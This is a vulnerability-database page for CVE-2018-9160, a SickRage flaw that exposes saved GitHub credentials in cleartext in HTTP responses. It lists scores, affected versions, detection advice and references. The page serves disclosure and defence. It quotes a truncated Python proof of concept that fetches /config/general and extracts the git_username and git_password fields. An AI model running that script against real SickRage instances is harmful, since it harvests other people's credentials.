CVE-2018-9160
published 2018-03-31CVE-2018-9160: SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
PriorityP275critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
76.52%
99.5th percentile
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sickrage | sickrage | <= 9.2.101 | — |
| sickrage | sickrage | >= 0 < 2018.03.09-1 | 2018.03.09-1 |
| sickrage | sickrage | >= 0 < 8156a74a68aea930d1e1047baba8b115c3abfc44 | 8156a74a68aea930d1e1047baba8b115c3abfc44 |
| sickrage | sickrage | >= 0 < 9.3.2 | 9.3.2 |
Detection & IOCsextracted from sources · hover to see the quote
- →Unauthenticated HTTP GET requests to /config/general on SickRage instances should be alerted on; the response will contain cleartext GitHub credentials in HTML input fields with id='git_username' and id='git_password'. ↗
- →SickRage does not require login credentials by default, meaning /config/general is accessible without authentication. Monitor for unauthenticated access to this endpoint. ↗
- →Shodan can be used to identify exposed SickRage instances; attackers may pivot from Shodan lookups to credential harvesting against /config/general. ↗
- ·The vulnerability only exposes credentials if the user has configured GitHub credentials in SickRage but has NOT set login protection on the SickRage web interface. Instances with login credentials configured are not exploitable via unauthenticated access. ↗
- ·The fix was introduced in v2018.03.09-1; the Metasploit module references a later boundary of v2018-09-03, suggesting the window of affected versions should be verified against the specific build in use. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
SiCKRAGE Discloses Plaintext Credentials
ghsa·2022-05-13
CVE-2018-9160 [CRITICAL] CWE-522 SiCKRAGE Discloses Plaintext Credentials
SiCKRAGE Discloses Plaintext Credentials
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
OSV
SiCKRAGE Discloses Plaintext Credentials
osv·2022-05-13
CVE-2018-9160 [CRITICAL] SiCKRAGE Discloses Plaintext Credentials
SiCKRAGE Discloses Plaintext Credentials
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
OSV
CVE-2018-9160: SickRage before v2018
osv·2018-03-31
CVE-2018-9160 CVE-2018-9160: SickRage before v2018
SickRage before v2018.03.09-1 includes cleartext credentials in HTTP responses.
No detection rules found.
Exploit-DB
SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
exploitdb·2018-04-26·CVSS 9.8
CVE-2018-9160 [CRITICAL] SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response
SickRage
[...]
[...]
[...]
#3. Proof of Concept
#!/usr/bin/env python
import urllib3
import sys
import requests
from BeautifulSoup import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
init(autoreset=True)
if __name__ == '__main__':
if len(sys.argv) != 3:
print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]"
else:
host = sys.argv[1]
print "https://www.shodan.io/host/{0}".format(host)
port = sys.argv[2]
print "*** Get GitHub User credentials from SickRage ***"
url = "http://{0}:{1}/config/general".format(host, port)
response = requests.get(url, timeout=5)
parsed_html = BeautifulSoup(response.text)
try:
git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value")
git_password = parsed_html.body.find('input', {'id': 'git_pa
Metasploit
HTTP SickRage Password Leak
metasploit
HTTP SickRage Password Leak
HTTP SickRage Password Leak
SickRage < v2018-09-03 allows an attacker to view a user's saved Github credentials in HTTP responses unless the user has set login information for SickRage. By default, SickRage does not require login information for the installation.
No writeups or analysis indexed.
https://github.com/SickRage/SickRage/commit/8156a74a68aea930d1e1047baba8b115c3abfc44https://github.com/SickRage/sickrage.github.io/blob/master/sickrage-news/CHANGES.mdhttps://www.exploit-db.com/exploits/44545/https://github.com/SickRage/SickRage/commit/8156a74a68aea930d1e1047baba8b115c3abfc44https://github.com/SickRage/sickrage.github.io/blob/master/sickrage-news/CHANGES.mdhttps://www.exploit-db.com/exploits/44545/
2018-03-31
Published